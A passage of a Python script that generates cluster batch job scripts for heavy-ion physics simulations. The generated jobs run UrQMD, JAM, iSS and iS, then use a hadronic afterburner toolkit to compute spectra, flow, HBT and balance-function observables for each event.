# elif 20151016 < int(logfile[-12:-4]) and int(logfile[-12:-4]) < 20151020 :
# rowlen = 4665.
# elif 20151001 < int(logfile[-12:-4]) and int(logfile[-12:-4]) < 20151015 :
# rowlen = 4660.
# else:
# rowlen = 4666.0 # Station name Parsivel4
#
# elif site == 'nya':
# rowlen = 4660.0
#set keys where strings will be put in, to string arrays:
for k,key in enumerate(colnames):
if k == 10 or k == 11 or k == 14 or k == 15 or k == 17:
dic[key] = np.empty(filelen,dtype = 'S20')
elif k == 18 or k == 19:
dic[key] = np.zeros([32,filelen])
elif k == 20:
dic[key] = np.zeros([32,32,filelen])
else:
dic[key] = np.nan * np.ones(filelen)
#read file:
if site == 'jue':
f = open(logfile,'r')
elif site == 'nya':
f = io.open(logfile,'r', encoding='ISO-8859-1')
for line in f.readlines(): # for each line split up string, put value into corresponding array if rowlen normal.
line = line.strip()
cols = line.split(';')
if 20150917 < int(logfile[-12:-4]) and int(logfile[-12:-4]) < 20151017 :
cols = [s.replace('<', '') for s in cols]
cols = [s.replace('>', '') for s in cols]
#1/0
#print 'len(line)', len(line), rowlen, len(line) == rowlen, 'len(cols)', len(cols), len(cols) == 1107
for i,cname in enumerate(colnames): # loop through columns
#if len(line) == rowlen :# and cols[14] < 2: # check status of parsivel: if 0 or 1: sensor usable, if 2 or 3: not usable.
if 1 == 1:
try:
test = float(cols[0][0:4])
except: continue
if test < 2000: # time stamp missing or in the wrong place
continue
if len(cols) == 1106:
tempcols = collections.deque(cols)
tempcols.extendleft([cols[0][0:18]])
tempcols[1] = tempcols[1][18:-1]
cols = list(tempcols)
elif len(cols) != 1107:
continue
if i == 0:
dic[cname][iline] = time2unix(cols[i])
elif i == 10 or i == 11 or i == 14 or i == 15 or i == 17: #all columns containing strings
dic[cname][iline] = str(cols[i])
elif i == 18:
for aa in range(32):
try:
dic[cname][aa,iline] = float(cols[i+aa]) #cols 18 upto 49 (32 values)
except ValueError:
dic[cname][aa,iline] = np.nan
if dic[cname][aa,iline] == -9.999 : dic[cname][aa,iline] = np.nan
elif i == 19:
for aa in range(32):
try:
dic[cname][aa,iline] = float(cols[50+aa]) #cols 50 upto 81 (32 values)
except ValueError:
dic[cname][aa,iline] = np.nan
if dic[cname][aa,iline] == -9.999 : dic[cname][aa,iline] = np.nan
elif i == 20:
for bb in range(32): #loop through falling velocities, ie rows in matrix
for aa in range(32): #loop through sizes, ie columns
try:
dic[cname][aa,bb,iline] = float(cols[82+32*aa+bb])
if float(cols[82+32*aa+bb]) < 1000000: dic[cname][aa,bb,iline] = np.nan
except ValueError:
dic[cname][aa,bb,iline] = np.nan
else:
#if i == 1: 1/0
                    if len(cols) == 1107: # RG 5.8.2016: any other length means something is wrong with this line (e.g. time stamp missing)
try:
dic[cname][iline] = float(cols[i])
except ValueError:
dic[cname][iline] = np.nan
else :
dic[cname][iline] = np.nan
#if iline == 1: 1/0
iline += 1
f.close()
return dic
################################################################################################
################################################################################################
def writeNC_old(logfile,ncname): #valid for data Aug2013-Apr17,2015
    #read .log-file into dictionary:
data = readASCII_old(logfile)
#get number of lines in file ie length of data columns
filelen = len(data['unixtime'])
#open .nc outfile.
ncout = Dataset(ncname,'w',format='NETCDF4')
# define dimensions:
dim = ncout.createDimension('dim', filelen) #filelen, set='none' if unlimited dimension
ndim = ncout.createDimension('ndim',32)
stri = ncout.createDimension('stri',None)
#read variables:
time = ncout.createVariable('time','i8',('dim',)) #time in double-precision...
time.units = 'seconds since 1/1/1970 00:00:00'
time[:] = data['unixtime']
rain_rate = ncout.createVariable('rain_rate','f',('dim',))
rain_rate.units = 'mm/h'
rain_rate[:] = data['rr']
rain_accum = ncout.createVariable('rain_accum','f',('dim',))
rain_accum.units = 'mm'
rain_accum[:] = data['r_accum']
wawa = ncout.createVariable('wawa','f',('dim',))
wawa.units = 'weather code'
wawa[:] = data['wawa']
zeff = ncout.createVariable('Z','f',('dim',))
zeff.units = 'dB'
zeff[:] = data['z']
vis = ncout.createVariable('MOR_visibility','f',('dim',))
vis.units = 'm'
vis[:] = data['vis']
interval = ncout.createVariable('sample_interval','f',('dim',))
interval.units = 's'
interval[:] = data['interval']
ampli = ncout.createVariable('signal_amplitude','f',('dim',))
ampli.units = ''
ampli[:] = data['amp']
n_part = ncout.createVariable('n_particles','f',('dim',))
n_part.units = '#'
n_part.description = 'number of detected particles'
n_part[:] = data['nmb']
temp_sens = ncout.createVariable('T_sensor','f',('dim',))
temp_sens.units = 'deg C'
temp_sens[:] = data['T_sensor']
serial_no = ncout.createVariable('serial_no','S',('stri',))
serial_no[:] = data['serial_no']
version = ncout.createVariable('version','S',('stri',))
version.description = 'IOP firmware version'
version[:] = data['version']
curr_heating = ncout.createVariable('curr_heating','f',('dim',))
curr_heating.units = 'A'
curr_heating.description = 'Current heating system'
curr_heating[:] = data['curr_heating']
volt_sensor = ncout.createVariable('volt_sensor','f',('dim',))
volt_sensor.units = 'V'
volt_sensor.description = 'Power supply voltage in the sensor'
volt_sensor[:] = data['volt_sensor']
status_sensor = ncout.createVariable('status_sensor','S',('stri',))
status_sensor[:] = data['status_sensor']
station_name = ncout.createVariable('station_name','S',('stri',))
station_name[:] = data['station_name']
rain_am = ncout.createVariable('rain_am','f',('dim',))
rain_am.units = 'mm'
rain_am.description = 'rain amount absolute'
rain_am[:] = data['r_amount']
error_code = ncout.createVariable('error_code','S',('stri',))
error_code[:] = data['error_code']
N = ncout.createVariable('N','f',('ndim','dim'))
N.units = '1/m3'
N.description = 'mean volume equivalent diameter per preci class'
N[:,:] = data['n']
v = ncout.createVariable('v','f',('ndim','dim'))
v.units = 'm/s'
v.description = 'mean falling speed per preci class'
v[:,:] = data['v']
#close .nc-file:
ncout.close()
return
##################################################################################################
##################################################################################################
def writeNC(logfile,ncname, site):
    #read .log-file into dictionary:
data = readASCII(logfile, site)
#get number of lines in file ie length of data columns
filelen = len(data['unixtime'])
#open .nc outfile.
ncout = Dataset(ncname,'w',format='NETCDF4')
# define dimensions:
dim = ncout.createDimension('dim', filelen) #filelen, set='none' if unlimited dimension
ndim = ncout.createDimension('ndim',32)
stri = ncout.createDimension('stri',None)
#read variables:
time = ncout.createVariable('time','i8',('dim',)) #time in double-precision...
time.units = 'seconds since 1/1/1970 00:00:00'
time[:] = data['unixtime']
rain_rate = ncout.createVariable('rain_rate','f',('dim',))
rain_rate.units = 'mm/h'
rain_rate[:] = data['rr']
rain_accum = ncout.createVariable('rain_accum','f',('dim',))
rain_accum.units = 'mm'
rain_accum[:] = data['r_accum']
wawa = ncout.createVariable('wawa','f',('dim',))
wawa.units = 'weather code'
wawa[:] = data['wawa']
zeff = ncout.createVariable('Z','f',('dim',))
zeff.units = 'dB'
zeff[:] = data['z']
vis = ncout.createVariable('MOR_visibility','f',('dim',))
vis.units = 'm'
vis[:] = data['vis']
interval = ncout.createVariable('sample_interval','f',('dim',))
interval.units = 's'
interval[:] = data['interval']
ampli = ncout.createVariable('signal_amplitude','f',('dim',))
ampli.units = ''
ampli[:] = data['amp']
n_part = ncout.createVariable('n_particles','f',('dim',))
n_part.units = '#'
n_part.description = 'number of detected particles'
n_part[:] = data['nmb']
temp_sens = ncout.createVariable('T_sensor','f',('dim',))
temp_sens.units = 'deg C'
temp_sens[:] = data['T_sensor']
serial_no = ncout.createVariable('serial_no','S6',('stri',))
serial_no[:] = data['serial_no']
version = ncout.createVariable('version','S5',('stri',))
version.description = 'IOP firmware version'
version[:] = data['version']
curr_heating = ncout.createVariable('curr_heating','f',('dim',))
curr_heating.units = 'A'
curr_heating.description = 'Current heating system'
curr_heating[:] = data['curr_heating']
volt_sensor = ncout.createVariable('volt_sensor','f',('dim',))
volt_sensor.units = 'V'
volt_sensor.description = 'Power supply voltage in the sensor'
volt_sensor[:] = data['volt_sensor']
status_sensor = ncout.createVariable('status_sensor','S2',('stri',))
status_sensor[:] = data['status_sensor']
station_name = ncout.createVariable('station_name','S5',('stri',))
station_name[:] = data['station_name']
rain_am = ncout.createVariable('rain_am','f',('dim',))
rain_am.units = 'mm'
rain_am.description = 'rain amount absolute'
rain_am[:] = data['r_amount']
error_code = ncout.createVariable('error_code','S3',('stri',))
error_code[:] = data['error_code']
N = ncout.createVariable('N','f',('ndim','dim'))
N.units = '1/m3'
N.description = 'mean volume equivalent diameter per preci class'
N[:,:] = data['n']
v = ncout.createVariable('v','f',('ndim','dim'))
v.units = 'm/s'
v.description = 'mean falling velocity per preci class'
v[:,:] = data['v']
M = ncout.createVariable('M','f',('ndim','ndim','dim'))
M.units = ''
M.description = 'raw data matrix. number of particles per volume diameter and fall velocity'
M[:,:,:] = data['M']
#close .nc-file:
ncout.close()
return
| 32.997984
| 149
| 0.497892
| 1,888
| 16,367
| 4.241525
| 0.164725
| 0.097278
| 0.021229
| 0.026224
| 0.798576
| 0.76973
| 0.742882
| 0.705919
| 0.70467
| 0.693806
| 0
| 0.038852
| 0.320645
| 16,367
| 495
| 150
| 33.064646
| 0.681356
| 0.143765
| 0
| 0.749153
| 0
| 0
| 0.136686
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020339
| false
| 0
| 0.023729
| 0
| 0.064407
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
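The parsivel_log_nc_convert.py row above is a two-stage converter: parse each ASCII .log line (timestamps via strptime + calendar.timegm, -9.999 sentinels mapped to NaN) into a dict of arrays, then mirror that dict into netCDF4 variables. A condensed sketch of those two core steps; 'example.nc' and the sample timestamp are invented for illustration:

# Hypothetical, condensed sketch of the converter's two core steps.
import calendar
import datetime
from netCDF4 import Dataset

def time2unix(datestring):
    # "%Y%m%d%H%M%S.%f" matches the Parsivel .log timestamp column
    f = datetime.datetime.strptime(datestring, "%Y%m%d%H%M%S.%f")
    return calendar.timegm(f.timetuple())

ncout = Dataset('example.nc', 'w', format='NETCDF4')
ncout.createDimension('dim', 1)
time = ncout.createVariable('time', 'i8', ('dim',))
time.units = 'seconds since 1/1/1970 00:00:00'
time[:] = [time2unix('20150417120000.00')]
ncout.close()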
e353c5b2d062a86353d9f383614aa22cb103c78e
| 129
|
py
|
Python
|
shenfun/forms/__init__.py
|
spectralDNS/shenfun
|
956633aa0f1638db5ebdc497ff68a438aa22b932
|
[
"BSD-2-Clause"
] | 138
|
2017-06-17T13:30:27.000Z
|
2022-03-20T02:33:47.000Z
|
shenfun/forms/__init__.py
|
liqihao2000/shenfun
|
2164596ccf906242779d9ec361168246ee6214d8
|
[
"BSD-2-Clause"
] | 73
|
2017-05-16T06:53:04.000Z
|
2022-02-04T10:40:44.000Z
|
shenfun/forms/__init__.py
|
liqihao2000/shenfun
|
2164596ccf906242779d9ec361168246ee6214d8
|
[
"BSD-2-Clause"
] | 38
|
2018-01-31T14:37:01.000Z
|
2022-03-31T15:07:27.000Z
|
#pylint: disable=missing-docstring
from .project import *
from .inner import *
from .operators import *
from .arguments import *
| 21.5
| 34
| 0.767442
| 16
| 129
| 6.1875
| 0.625
| 0.30303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 129
| 5
| 35
| 25.8
| 0.891892
| 0.255814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8b6aff3ae21b13d384de66d9fedadc7af942756d
| 34,294
|
py
|
Python
|
ebe_scripts/generate_jobs.py
|
LipeiDu/hadronic_afterburner_toolkit
|
770cbd2582c988d3950e6707ceaeb7752212ac46
|
[
"MIT"
] | 3
|
2016-12-01T21:25:15.000Z
|
2021-08-17T19:57:37.000Z
|
ebe_scripts/generate_jobs.py
|
LipeiDu/hadronic_afterburner_toolkit
|
770cbd2582c988d3950e6707ceaeb7752212ac46
|
[
"MIT"
] | null | null | null |
ebe_scripts/generate_jobs.py
|
LipeiDu/hadronic_afterburner_toolkit
|
770cbd2582c988d3950e6707ceaeb7752212ac46
|
[
"MIT"
] | 4
|
2018-01-26T01:43:41.000Z
|
2020-10-21T19:01:27.000Z
|
#!/usr/bin/env python
import sys
from os import path, mkdir
import shutil
from glob import glob
import subprocess
import random
def write_script_header(cluster, script, event_id, walltime, working_folder):
if cluster == "nersc":
script.write(
"""#!/bin/bash -l
#SBATCH -p shared
#SBATCH -n 1
#SBATCH -J UrQMD_%s
#SBATCH -t %s
#SBATCH -L SCRATCH
#SBATCH -C haswell
""" % (event_id, walltime))
elif cluster == "guillimin":
script.write(
"""#!/usr/bin/env bash
#PBS -N UrQMD_%s
#PBS -l nodes=1:ppn=1
#PBS -l walltime=%s
#PBS -S /bin/bash
#PBS -e test.err
#PBS -o test.log
#PBS -A cqn-654-ad
#PBS -q sw
#PBS -d %s
""" % (event_id, walltime, working_folder))
elif cluster == "McGill":
script.write(
"""#!/usr/bin/env bash
#PBS -N UrQMD_%s
#PBS -l nodes=1:ppn=1:irulan
#PBS -l walltime=%s
#PBS -S /bin/bash
#PBS -e test.err
#PBS -o test.log
#PBS -d %s
""" % (event_id, walltime, working_folder))
else:
print("Error: unrecoginzed cluster name :", cluster)
print("Available options: nersc, guillimin, McGill")
exit(1)
def write_analysis_spectra_and_vn_commands(script, after_burner_type):
pid_particle_list = ['211', '-211', '321', '-321', '2212', '-2212',
'3122', '-3122', '3312', '-3312', '3334', '-3334',
'333']
charged_particle_list = ['9999', '9998', '-9998']
#pid_particle_list = []
#charged_particle_list = ['9999']
read_in_mode = 2
if after_burner_type == "JAM":
read_in_mode = 5
if after_burner_type == "OSCAR":
read_in_mode = 0
for ipart in charged_particle_list:
script.write(
"""
# charged hadrons
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-1.0 rap_max=-0.1 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=0.1 rap_max=1.0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=0.5 rap_max=2.0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-2.0 rap_max=-0.5 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-1.0 rap_max=1.0 compute_correlation=1 flag_charge_dependence=1 pT_min=0.2 pT_max=2.0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-2.0 rap_max=2.0 compute_correlation=1 flag_charge_dependence=1 pT_min=0.2 pT_max=2.0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-1.0 rap_max=1.0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-2.0 rap_max=2.0 >> ../output.log
""".format(read_in_mode, ipart))
for ipart in pid_particle_list:
script.write(
"""
#./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=1 rap_type=0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=1 rap_type=1 >> ../output.log
""".format(read_in_mode, ipart))
def write_analysis_particle_distrubtion_commands(script, after_burner_type):
pid_particle_list = ['211', '-211', '321', '-321', '2212', '-2212',
'3122', '-3122']
charged_particle_list = ['9997', '-9997', '9998', '-9998']
read_in_mode = 2
if after_burner_type == "JAM":
read_in_mode = 5
if after_burner_type == "OSCAR":
read_in_mode = 0
for ipart in pid_particle_list:
script.write(
"""
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=1 rap_type=0 >> output.log
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=1 rap_type=1 >> output.log
""".format(read_in_mode, ipart))
if "-" not in ipart:
script.write(
"""
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} distinguish_isospin=1 rap_type=0 net_particle_flag=1 >> output.log
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} distinguish_isospin=1 rap_type=1 net_particle_flag=1 >> output.log
""".format(read_in_mode, ipart))
for ipart in charged_particle_list:
script.write(
"""
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 >> output.log
""".format(read_in_mode, ipart))
if "-" not in ipart:
script.write(
"""
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 net_particle_flag=1 >> output.log
""".format(read_in_mode, ipart))
script.write(
"""
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval=9999 resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 >> output.log
""".format(read_in_mode))
def generate_script(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '10:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir UrQMD_results
for iev in `ls OSCAR_events`
do
cd osc2u
./osc2u.e < ../OSCAR_events/$iev
mv fort.14 ../urqmd/OSCAR.input
cd ../urqmd
./runqmd.sh
mv particle_list.dat ../UrQMD_results/particle_list_`echo $iev | cut -f 2 -d _`
cd ..
done
""")
script.close()
def generate_script_JAM(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '10:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/scratch/irulan/chun/JAM/JAM_lib/lib
mkdir JAM_results
for iev in `ls OSCAR_events`
do
eventid=`echo $iev | cut -f 2 -d "_" | cut -f 1 -d "."`
cd JAM
mv ../OSCAR_events/$iev ./OSCAR.DAT
rm -fr phase.dat
./jamgo
mv phase.dat ../JAM_results/particle_list_$eventid.dat
mv OSCAR.DAT ../OSCAR_events/OSCAR_$eventid.dat
cd ..
done
""")
script.close()
def generate_script_iSS(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '35:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir UrQMD_results
mkdir spvn_results
for iev in `ls hydro_events --color=none | grep "surface"`
do
event_id=`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd iSS
if [ -d "results" ]; then
rm -fr results
fi
mkdir results
mv ../hydro_events/$iev results/surface.dat
cp ../hydro_events/music_input_event_$event_id results/music_input
./iSS.e >> ../output.log
mv results/surface.dat ../hydro_events/$iev
#rm -fr results/sample*
# turn on global momentum conservation
./correct_momentum_conservation.py OSCAR.DAT
mv OSCAR_w_GMC.DAT OSCAR.DAT
cd ../osc2u
./osc2u.e < ../iSS/OSCAR.DAT >> ../output.log
mv fort.14 ../urqmd/OSCAR.input
cd ../urqmd
./runqmd.sh >> ../output.log
mv particle_list.dat ../UrQMD_results/particle_list_$event_id.dat
#mv ../iSS/OSCAR.DAT ../UrQMD_results/OSCAR_$event_id.dat
rm -fr ../iSS/OSCAR.DAT
rm -fr OSCAR.input
cd ..
./hadronic_afterburner_toolkit/convert_to_binary.e UrQMD_results/particle_list_$event_id.dat
rm -fr UrQMD_results/particle_list_$event_id.dat
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../UrQMD_results/particle_list_$event_id.gz results/particle_list.dat
""")
write_analysis_spectra_and_vn_commands(script, "UrQMD")
script.write(
"""
mv results/particle_list.dat ../UrQMD_results/particle_list_$event_id.gz
mv results ../spvn_results/event_$event_id
cd ..
done
""")
script.close()
def generate_script_iS(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '3:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir spvn_results
for iev in `ls hydro_events --color=none | grep "surface"`
do
event_id=`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd iS
if [ -d "results" ]; then
rm -fr results
fi
mkdir results
mv ../hydro_events/$iev results/surface.dat
cp ../hydro_events/music_input_event_$event_id results/music_input
./iS_withResonance.sh >> ../output.log
mv results/surface.dat ../hydro_events/$iev
mv results/ ../spvn_results/event_$event_id
cd ..
done
""")
script.close()
def generate_script_HBT(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '20:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir HBT_results
for iev in `ls UrQMD_events | grep "particle_list"`
do
eventid=`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../UrQMD_events/$iev results/particle_list.dat
mv ../UrQMD_events/mixed_event_$eventid.dat results/particle_list_mixed_event.dat
./hadronic_afterburner_tools.e read_in_mode=2 run_mode=1 resonance_feed_down_flag=0 > output.log
mv results/particle_list.dat ../UrQMD_events/$iev
mv results/particle_list_mixed_event.dat ../UrQMD_events/mixed_event_$eventid.dat
mv results ../HBT_results/event_$eventid
cd ..
done
""")
script.close()
def generate_script_HBT_with_JAM(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '30:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir HBT_results
for iev in `ls JAM_events | grep "particle_list"`
do
eventid=`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../JAM_events/$iev results/particle_list.dat
mv ../JAM_events/mixed_event_$eventid.dat results/particle_list_mixed_event.dat
./hadronic_afterburner_tools.e run_mode=1 read_in_mode=5 resonance_feed_down_flag=0 > output.log
mv results/particle_list.dat ../JAM_events/$iev
mv results/particle_list_mixed_event.dat ../JAM_events/mixed_event_$eventid.dat
mv results ../HBT_results/event_$eventid
cd ..
done
""")
script.close()
def generate_script_balance_function(cluster_name, folder_name):
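    """Write the PBS script that computes balance functions from UrQMD
    particle lists for each (particle_alpha, particle_beta) pair in
    particle_a_list/particle_b_list."""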
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '01:00:00'
particle_a_list = ['9998']
particle_b_list = ['-9998']
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir BalanceFunction_results
for iev in `ls UrQMD_events | grep "particle_list"`
do
eventid=`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../UrQMD_events/$iev results/particle_list.dat
mv ../UrQMD_events/mixed_event_$eventid.dat results/particle_list_mixed_event.dat
""")
for ipart in range(len(particle_a_list)):
script.write(
"""
./hadronic_afterburner_tools.e read_in_mode=2 run_mode=3 resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-1.0 rap_max=1.0 particle_alpha={0} particle_beta={1} BpT_min=0.2 BpT_max=3.0 > output.log
""".format(particle_a_list[ipart], particle_b_list[ipart]))
script.write(
"""
mv results/particle_list.dat ../UrQMD_events/$iev
mv results/particle_list_mixed_event.dat ../UrQMD_events/mixed_event_$eventid.dat
mv results ../BalanceFunction_results/event_$eventid
cd ..
done
""")
script.close()
def generate_script_spectra_and_vn(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '1:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir spvn_results
for iev in `ls UrQMD_events | grep "particle_list"`
do
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../UrQMD_events/$iev results/particle_list.dat
""")
write_analysis_spectra_and_vn_commands(script, "UrQMD")
script.write(
"""
mv results/particle_list.dat ../UrQMD_events/$iev
mv results ../spvn_results/event_`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd ..
done
""")
script.close()
def generate_script_particle_yield_distribution(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '1:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir spvn_results
for iev in `ls UrQMD_events | grep "particle_list"`
do
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../UrQMD_events/$iev results/particle_list.dat
""")
write_analysis_particle_distrubtion_commands(script, "UrQMD")
script.write(
"""
mv results/particle_list.dat ../UrQMD_events/$iev
mv results ../spvn_results/event_`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd ..
done
""")
script.close()
def generate_script_particle_yield_distribution_with_OSCAR(cluster_name,
folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '1:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir spvn_results
for iev in `ls OSCAR_events`
do
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../OSCAR_events/$iev results/OSCAR.DAT
""")
write_analysis_particle_distrubtion_commands(script, "OSCAR")
script.write(
"""
mv results/OSCAR.DAT ../OSCAR_events/$iev
mv results ../spvn_results/event_`echo $iev | cut -f 2 -d _ | cut -f 1 -d .`
cd ..
done
""")
script.close()
def generate_script_spectra_and_vn_with_JAM(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '3:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir spvn_results
for iev in `ls JAM_events | grep "particle_list"`
do
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../JAM_events/$iev results/particle_list.dat
""")
write_analysis_spectra_and_vn_commands(script, "JAM")
script.write(
"""
mv results/particle_list.dat ../JAM_events/$iev
mv results ../spvn_results/event_`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd ..
done
""")
script.close()
def generate_script_HBT_with_OSCAR(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '35:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir HBT_results
for iev in `ls OSCAR_events | grep "OSCAR"`
do
eventid=`echo $iev | cut -f 2 -d _ | cut -f 1 -d .`
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../OSCAR_events/$iev results/OSCAR.DAT
mv ../OSCAR_events/mixed_event_$eventid.dat results/OSCAR_mixed_event.DAT
./hadronic_afterburner_tools.e read_in_mode=0 run_mode=1 resonance_feed_down_flag=1 > output.log
mv results/OSCAR.DAT ../OSCAR_events/$iev
mv results/OSCAR_mixed_event.DAT ../OSCAR_events/mixed_event_$eventid.dat
mv results ../HBT_results/event_$eventid
cd ..
done
""")
script.close()
def copy_UrQMD_events(number_of_cores, input_folder, working_folder):
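    """Link UrQMD event files round-robin into the per-core working
    folders; each event also gets a randomly chosen mixed-event partner
    (required by the correlation analyses)."""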
events_list = glob('%s/particle_list_*.dat' % input_folder)
if events_list == []:
events_list = glob('%s/particle_list_*.gz' % input_folder)
if events_list == []:
print("Error: can not find UrQMD events, events_list is empty! ",
events_list)
else:
print("Linking zipped binary UrQMD events, ",
"make sure read_in_mode is set to 2~")
for iev in range(len(events_list)):
folder_id = iev % number_of_cores
filename = events_list[iev].split('/')[-1].split('.')[0]
event_id = filename.split('_')[-1]
folder_path = path.join(working_folder, 'event_%d' % folder_id,
